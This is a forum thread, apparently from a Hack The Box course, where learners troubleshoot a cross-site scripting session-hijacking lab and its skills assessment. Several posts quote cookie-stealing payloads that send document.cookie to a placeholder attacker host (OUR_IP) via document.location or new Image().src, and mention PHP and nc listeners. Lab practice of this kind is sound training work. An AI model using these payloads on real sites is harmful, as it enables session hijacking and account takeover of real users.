Cross Site Scripting - Session Hijacking

Hello all, please, again I am coming to you for help. I am currently trying to get my PHP server to give my script the file it needs to find the cookie I need. I know that might have been a little confusing; DM me if you don’t get my question.

Hi bro.

Can you explain again what the issue is, with more details and what you did to solve it, please? To know what you’re stuck on and why.

I finally got the flag but I am stuck again LOL!!! I am stuck on the skills assessment. Please help!

OK, I don’t know what I’m doing wrong. I got the PHP server set up. I sent my payload:

">

I put it in the Full Name, User Name, and Image form individually and separately and I keep getting blocked. I get activity on the server. I’m just not getting the cookie.

I’ve been hitting my head against this for a couple of days.

Have the PHP server running and I’m getting the first link back to my web server (http://myIP/script.js),
but that script isn’t opening my index.php file.

I’ve tried having document.location='http://OUR_IP/index.php?c='+document.cookie;
and the new Image().src='http://OUR_IP/index.php?c='+document.cookie;

and without the script tags with no luck either way.

Is the trick to get this to work some silly quote issue, or how can I see why the 2nd call to index.php is not going out?

Never mind. The magic was posting here.

Didn’t use “script.js” as a filename + making sure OUR_IP was actually changed. Maybe some other stuff but eventually got the index.php to be called.

I said that I can’t find the right payload.
Already tried all those listed ones…
I sent with my tun address, but they don’t request my PHP or nc server either.

tks

I’m getting the same as @paulorcsjr. I’ve very carefully done every single step according to the steps laid out in the write-up. I think the backend of HTB is broken. Is there a way to work around the broken infrastructure? The scripts written for this exercise on the backend are failing and won’t let anyone properly finish this section.